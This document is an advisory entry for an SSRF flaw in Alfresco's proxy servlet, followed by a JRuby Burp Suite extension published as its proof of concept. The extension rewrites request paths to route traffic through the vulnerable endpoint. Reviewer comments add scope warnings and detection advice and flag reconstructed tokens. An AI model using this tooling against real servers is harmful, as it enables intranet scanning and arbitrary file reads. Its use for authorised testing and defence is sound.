INFO
Server-side request forgery (SSRF) vulnerability in the proxy servlet in Alfresco Community Edition before 5.0.a allows remote attackers to trigger outbound requests to intranet servers, conduct port scans, and read arbitrary files via a crafted URI in the endpoint parameter.
POC
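require 'java'

java_import 'burp.IBurpExtender'
java_import 'burp.IHttpListener'
java_import 'burp.IMessageEditorController'

# Burp Suite extension (JRuby) published as the proof of concept for the
# Alfresco proxy-servlet SSRF (crafted URI in the `endpoint` parameter).
#
# What the code does: it registers an HTTP listener that rewrites outgoing
# request paths. It reads a "/alfresco/...:<port>/" prefix from the Referer
# header, remembers it, and re-prefixes later requests with that remembered
# path.
#
# NOTE(review): the listener rewrites requests from every Burp tool and for
# every host; nothing here checks Burp's target scope. Add a scope check
# before loading it anywhere but an isolated test instance you are
# authorised to assess.
#
# NOTE(review): on the server side, proxy-servlet requests whose `endpoint`
# parameter carries an unexpected URI are the signal worth logging and
# alerting on. The advisory text gives the affected range as "before 5.0.a".
#
# NOTE(review): the page's copy of this file was collapsed onto two lines
# and two tokens were damaged (see the comments at `rescue []` and
# `rel[-1]`). Both are reconstructions, to be confirmed against the
# original extension.
class BurpExtender
  include IBurpExtender, IHttpListener, IMessageEditorController

  #
  # implement IBurpExtender
  #
  # Called once by Burp when the extension is loaded.
  #
  # @param callbacks [IBurpExtenderCallbacks] Burp's callback object
  def registerExtenderCallbacks(callbacks)
    #@HOST_FROM = 'host1.example.org'
    #@HOST_TO = 'host2.example.org'

    # The page's version never stored this, so the `callbacks` getter below
    # always returned nil.
    @callbacks = callbacks

    # obtain an extension helpers object
    @helpers = callbacks.getHelpers()

    # set our extension name
    callbacks.setExtensionName("Traffic redirector")

    # register ourselves as an HTTP listener
    callbacks.registerHttpListener(self)
  end

  #
  # implement IHttpListener
  #
  # Rewrites the request carried by messageInfo in place. Responses are not
  # modified. A separator line is printed for every message.
  #
  # @param toolFlag [Integer] Burp tool that issued the message (unused)
  # @param messageIsRequest [Boolean] true for requests, false for responses
  # @param messageInfo [IHttpRequestResponse] the message being processed
  def processHttpMessage(toolFlag, messageIsRequest, messageInfo)
    # only process requests
    if (messageIsRequest)
      # get the HTTP service for the request (only used by the commented-out
      # host rewrite at the end of this branch)
      httpService = messageInfo.getHttpService()
      request = messageInfo.getRequest()
      raw = request.to_s
      request_line = raw.lines.first.to_s

      # A request line mentioning 'endpoint' resets the remembered prefix so
      # it is derived again from this request's Referer.
      @root_path = nil unless request_line.index('endpoint').nil?

      referer = raw.scan(/Referer: (.*)/)
      referer.flatten!
      # NOTE(review): the page shows a dangling `rescue` here with no
      # fallback value; `[]` is assumed (bracket characters look stripped by
      # the wiki renderer). With no Referer header, `referer.first` is nil
      # and the fallback makes both derived paths below empty.
      referer = referer.first.scan(/(\/alfresco\/.*:\d+\/)(.*)/) rescue []
      root_path = referer.flatten.first
      relative_path = "/#{referer.flatten.last}"

      if @root_path.nil? || @root_path.to_s != root_path
        @root_path = root_path unless root_path.nil?
        @relative_path = relative_path unless root_path.nil?
      end

      puts "INSTANCE_ROOT_PATH: #{@root_path}"
      puts "Instance Relative_PATH: #{@relative_path}"
      puts "ROOT_PATH: #{root_path}"
      puts "Relative_PATH: #{relative_path}"
      puts request_line

      # Without a remembered prefix there is nothing to rewrite with. The
      # page's version raised here (String#sub with a nil replacement) and
      # the request went out unmodified; leave it untouched instead.
      return if @root_path.nil?

      # String#sub always returns a String, so the page's
      # `new_req = request if new_req.nil?` fallback could never fire.
      new_req = raw.sub("/alfresco/", "/")

      if new_req.lines.first.to_s.count('/') < 3
        print "Single dash "
        puts new_req.lines.first
        unless root_path == relative_path || @relative_path.nil?
          rel = @relative_path.split("/")
          # NOTE(review): the page shows `rel-1 = ""`, which is not valid
          # Ruby; restored as an index assignment that blanks the last path
          # segment.
          rel[-1] = ""
          new_req = new_req.sub("/", rel.join('/'))
        end
      end

      new_req = new_req.sub("/", @root_path)
      print "Final request "
      puts new_req

      messageInfo.setRequest(@helpers.stringToBytes(new_req))

      # if the host is HOST_FROM, change it to HOST_TO
      #if (@HOST_FROM == httpService.getHost())
      #  messageInfo.setHttpService(
      #    @helpers.buildHttpService(
      #      @HOST_TO,
      #      httpService.getPort(),
      #      httpService.getProtocol()
      #    )
      #  )
      #end
    end
  ensure
    puts '----------------------'
  end

  #
  # implement IMessageEditorController
  # this allows our request/response viewers to obtain details about the messages being displayed
  #
  # NOTE(review): @currentlyDisplayedItem is only set through the setter at
  # the bottom of the class; nothing in this file calls it, so these three
  # methods raise on nil unless a caller sets it first.
  def getHttpService()
    return @currentlyDisplayedItem.getHttpService()
  end

  def getRequest()
    return @currentlyDisplayedItem.getRequest()
  end

  def getResponse()
    return @currentlyDisplayedItem.getResponse()
  end

  #
  # getter / setters
  #
  def callbacks
    @callbacks
  end

  # @log, @requestViewer and @responseViewer are never assigned in this
  # file, so these getters return nil.
  def log
    @log
  end

  def requestViewer
    @requestViewer
  end

  def responseViewer
    @responseViewer
  end

  def currentlyDisplayedItem=(currentlyDisplayedItem)
    @currentlyDisplayedItem = currentlyDisplayedItem
  end
end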